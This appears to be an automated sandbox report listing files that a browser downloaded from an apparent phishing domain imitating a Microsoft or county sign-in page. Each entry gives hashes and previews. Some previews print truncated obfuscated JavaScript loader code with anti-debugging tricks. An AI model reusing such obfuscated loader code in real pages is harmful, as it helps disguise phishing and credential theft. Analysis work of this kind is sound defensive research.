                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (50758)
                                                                          Category:dropped
                                                                          Size (bytes):51039
                                                                          Entropy (8bit):5.247253437401007
                                                                          Encrypted:false
                                                                          SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                          MD5:67176C242E1BDC20603C878DEE836DF3
                                                                          SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                          SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                          SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 12 x 71, 8-bit/color RGB, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):61
                                                                          Entropy (8bit):4.035372245524404
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPlU/Jt6yxl/k4E08up:6v/lhP6/7Tp
                                                                          MD5:992F9850603D1F9EB470320B9EB0B174
                                                                          SHA1:1B42373E6B0AEDBA515031D255AB74AE917D0051
                                                                          SHA-256:0455AD3FBBC240087EC77C1A2B42931B4EEC4F5448ECE5585C5B1352337FE9B2
                                                                          SHA-512:4C5E061CF93818F6F0EB8EDDC1D141CA14ABDBFECE126330566473DCBCCDA61447FE37E3B23FC5EA4C3D04EEEDA600D9A5E83B01E7E67A3116D7913F9E299C3E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR.......G.......1.....IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):3202
                                                                          Entropy (8bit):4.236796532981122
                                                                          Encrypted:false
                                                                          SSDEEP:96:1I7uAxrF5zHeZ2lLBUaaJP/DBzaJIQiSJTEm:mxrvlqaaZ/xaxi6TEm
                                                                          MD5:7D2B8F25545A2894E2721E9FE528E34C
                                                                          SHA1:D0DAE76F4BF5C04ACD5FCDF1BCB12908099E328C
                                                                          SHA-256:797BDA35D13E5130FE5A14E0069C31B46EC1AF6EA47F2D300309803BB4D2608C
                                                                          SHA-512:FE1F84AF0BA1100B2A90EE6FBFBD3763EF34D1A3BF045345538302ECE7D37EAADC9A9CD0E09C2030E62B13A55E118A2417B27F14336C271758BFB3E256906385
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg id="MSLogo" width="99" height="22" xmlns="http://www.w3.org/2000/svg">..<g fill="none" fill-rule="evenodd">..<path fill="#737474"..d="m34.64 12.07-.58 1.65h-.04c-.1-.39-.28-.93-.56-1.63l-3.14-7.9h-3.08v12.56h2.03V9.03l-.03-1.7c-.01-.34-.05-.6-.06-.81h.05c.1.47.2.83.28 1.07l3.78 9.16h1.42l3.75-9.24c.08-.21.17-.62.25-1h.05c-.05.92-.1 1.76-.1 2.26v7.98h2.17V4.2h-2.96l-3.23 7.88z"../>..<path d="M0 20.96h98.15V0H0z" />..<path fill="#737474"..d="M42.87 16.75h2.11v-9h-2.11zm1.08-12.82c-.35 0-.66.12-.9.35a1.17 1.17 0 0 0-.38.88c0 .35.12.64.37.87.25.23.55.34.9.34s.67-.11.92-.34c.25-.23.38-.52.38-.86 0-.34-.13-.64-.37-.88a1.26 1.26 0 0 0-.92-.36m8.53 3.73a5.9 5.9 0 0 0-1.19-.12c-.97 0-1.83.2-2.57.62-.74.4-1.3 1-1.7 1.74a5.57 5.57 0 0 0-.01 4.9c.37.7.9 1.23 1.58 1.6.67.38 1.45.57 2.31.57 1.01 0 1.87-.2 2.56-.6l.03-.02v-1.94l-.1.07c-.3.23-.65.4-1.03.54a3.12 3.12 0 0 1-1.01.2c-.83 0-1.5-.26-1.98-.78a3 3 0 0 1-.73-2.14c0-.9.25-1.65.76-2.2a2.6 2.6 0 0 1 1.98-.81c.7 0 1.38.23 2.02.7l.09.06V8.01L5
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 12 x 71, 8-bit/color RGB, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):61
                                                                          Entropy (8bit):4.035372245524404
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPlU/Jt6yxl/k4E08up:6v/lhP6/7Tp
                                                                          MD5:992F9850603D1F9EB470320B9EB0B174
                                                                          SHA1:1B42373E6B0AEDBA515031D255AB74AE917D0051
                                                                          SHA-256:0455AD3FBBC240087EC77C1A2B42931B4EEC4F5448ECE5585C5B1352337FE9B2
                                                                          SHA-512:4C5E061CF93818F6F0EB8EDDC1D141CA14ABDBFECE126330566473DCBCCDA61447FE37E3B23FC5EA4C3D04EEEDA600D9A5E83B01E7E67A3116D7913F9E299C3E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cbff7d01962c33d/1727822571920/dF8dAYCSi2ZeUfY
                                                                          Preview:.PNG........IHDR.......G.......1.....IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):1592
                                                                          Entropy (8bit):4.205005284721148
                                                                          Encrypted:false
                                                                          SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                                          MD5:4E48046CE74F4B89D45037C90576BFAC
                                                                          SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                                          SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                                          SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):75925
                                                                          Entropy (8bit):5.227262733743973
                                                                          Encrypted:false
                                                                          SSDEEP:768:GuKCW4hz7E5T3LGrcqpH5/l3b/nnGD5qWjseUDw+EsfMWY3SazA/PWrF7qvEAFiA:lKguyw+EANazA/PWrF7qvEAFiQcpmIoP
                                                                          MD5:3ED91A738DACD5E5F7FFF1E515984B25
                                                                          SHA1:F530BC374249D640F65A282B9B742F30F678F485
                                                                          SHA-256:01DDAE43AFA0B63A161958DDA28D72798719DC0E752E4C92AE9F9C9A146F3703
                                                                          SHA-512:C9AD9261C93EE31634934FD824F694E3702C34A46C1C2755D90887F76E71F1EF16F39B864962F2A8FFECBBEE377D475C9C8EE2D517A39608C7EAB418F8DC7C78
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://sanbernardinoscounty.telcom-info.com/css_/DmiM9Aw3DnV3DPQ
                                                                          Preview:html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-0.5em}sub{bottom:-0.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (50758)
                                                                          Category:downloaded
                                                                          Size (bytes):51039
                                                                          Entropy (8bit):5.247253437401007
                                                                          Encrypted:false
                                                                          SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                          MD5:67176C242E1BDC20603C878DEE836DF3
                                                                          SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                          SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                          SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://sanbernardinoscounty.telcom-info.com/b_/66fc7b007c246-b860da8ffc87dc502860e1b645c22d2f
                                                                          Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):3651
                                                                          Entropy (8bit):4.094801914706141
                                                                          Encrypted:false
                                                                          SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                          MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                          SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                          SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                          SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (4903)
                                                                          Category:downloaded
                                                                          Size (bytes):5367
                                                                          Entropy (8bit):5.3919252652056535
                                                                          Encrypted:false
                                                                          SSDEEP:96:KuaedBNHy3Gt0HjZdnNIkja/dmQ1zM13RRJKodVcuT6grJ9XfnArRM:Hp3NS3GyHjezM13RR1Vcu+0J9XfnN
                                                                          MD5:57DE9FC42295C76736C7F0B89BB937E1
                                                                          SHA1:EB4C02A083B0B066D6D620AB8CCCC02215331A24
                                                                          SHA-256:705181EB514AA1DEDABCBCB367F757EBBCADE1BFFD55275269C7E25C4C59F334
                                                                          SHA-512:68CCB72E3828C5FBE712AF8EF8A228DC6423600F48C2876AAAD790FEA6106D558EEDDE8422D022DBF691122C013AC36BA8C87C520E228D95DF7E1961C030258A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          Preview:<!DOCTYPE html>.<html>.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <title></title>. <script src="js___/66fc7b007c23b-b860da8ffc87dc502860e1b645c22d2f"></script>. <script src="b_/66fc7b007c246-b860da8ffc87dc502860e1b645c22d2f"></script>. <script src="js_/66fc7b007c248-b860da8ffc87dc502860e1b645c22d2f"></script>.</head>..<script type="text/javascript">.. var a0_0x20ca42=a0_0x575f;function a0_0x1bf9(){var _0x31263c=['getAttribute','test','appendChild','script','innerHTML','shortcut\x20icon','(((.+)+)+)+$','rel','textContent','stateObject','chain','2299329RFeSkb','head','counter','href','stylesheet','createElement','10272384ryzcyv','responseText','src','apply','input','send','66952WTJaHh','onreadystatechange','debu','init','forEach','endsWith','GET','search','constructor','186815JueNBs','gger','call','function\x20*\x5c(\x20*\x5c)','318524HAQFgb','open','icon','2053700aArxbn','title','12WNNaNX','1
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                          Category:downloaded
                                                                          Size (bytes):17174
                                                                          Entropy (8bit):2.9129715116732746
                                                                          Encrypted:false
                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://sanbernardinoscounty.telcom-info.com/fav/BxFYbJCBp2C7xgu
                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (6645), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):6645
                                                                          Entropy (8bit):5.323156326570097
                                                                          Encrypted:false
                                                                          SSDEEP:192:2gSUlKzG+HNgGGZz6e+jDtH8jBpfFtr2BrAecTO:2dUozhtbkzH+jDtKpNwBFcq
                                                                          MD5:AD9F46DD1FB91B96EFB4A31DE1D50F77
                                                                          SHA1:03CA511BB1457FC368403B369EDA88F69D5A1558
                                                                          SHA-256:FB231833B3DA52E6925BD85EF97156B8DA3500AEE026D5FAC97BBA193A12A734
                                                                          SHA-512:F6284891F0244B6BAD61515EECB47EB5FD7529BBDFAE599E860E0325C24F78B76C8285F62A3DA65A678E493E7EB81F93B5E4E32770B165DD32583A4881F59819
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://sanbernardinoscounty.telcom-info.com/js_/66fc7b007c248-b860da8ffc87dc502860e1b645c22d2f
                                                                          Preview:const a0_0x826a2b=a0_0x1c3b;(function(_0x5c54e3,_0x3ae404){const _0x2b59cc=a0_0x1c3b,_0x11c240=_0x5c54e3();while(!![]){try{const _0x1d2224=parseInt(_0x2b59cc(0x115))/0x1+-parseInt(_0x2b59cc(0x113))/0x2+-parseInt(_0x2b59cc(0x12b))/0x3+-parseInt(_0x2b59cc(0x11c))/0x4+-parseInt(_0x2b59cc(0x128))/0x5+parseInt(_0x2b59cc(0x118))/0x6*(parseInt(_0x2b59cc(0x112))/0x7)+parseInt(_0x2b59cc(0x102))/0x8;if(_0x1d2224===_0x3ae404)break;else _0x11c240['push'](_0x11c240['shift']());}catch(_0x1737bc){_0x11c240['push'](_0x11c240['shift']());}}}(a0_0xddb9,0xbd844));const a0_0x5402c7=(function(){let _0x180fa5=!![];return function(_0x1e2174,_0x3b73d2){const _0x5641e0=_0x180fa5?function(){if(_0x3b73d2){const _0x1448ec=_0x3b73d2['apply'](_0x1e2174,arguments);return _0x3b73d2=null,_0x1448ec;}}:function(){};return _0x180fa5=![],_0x5641e0;};}()),a0_0x2f9e2a=a0_0x5402c7(this,function(){const _0x2d54d8=a0_0x1c3b;return a0_0x2f9e2a[_0x2d54d8(0x117)]()[_0x2d54d8(0x114)]('(((.+)+)+)+$')[_0x2d54d8(0x117)]()[_0x2d54d8(0
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):1864
                                                                          Entropy (8bit):5.222032823730197
                                                                          Encrypted:false
                                                                          SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                          MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                          SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                          SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                          SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):1864
                                                                          Entropy (8bit):5.222032823730197
                                                                          Encrypted:false
                                                                          SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                          MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                          SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                          SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                          SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://sanbernardinoscounty.telcom-info.com/2svg/ZLWhvXZy16NYSMW
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (32065)
                                                                          Category:downloaded
                                                                          Size (bytes):85578
                                                                          Entropy (8bit):5.366055229017455
                                                                          Encrypted:false
                                                                          SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                          MD5:2F6B11A7E914718E0290410E85366FE9
                                                                          SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                          SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                          SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://sanbernardinoscounty.telcom-info.com/js___/66fc7b007c23b-b860da8ffc87dc502860e1b645c22d2f
                                                                          Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65447)
                                                                          Category:downloaded
                                                                          Size (bytes):89501
                                                                          Entropy (8bit):5.289893677458563
                                                                          Encrypted:false
                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                          Malicious:false
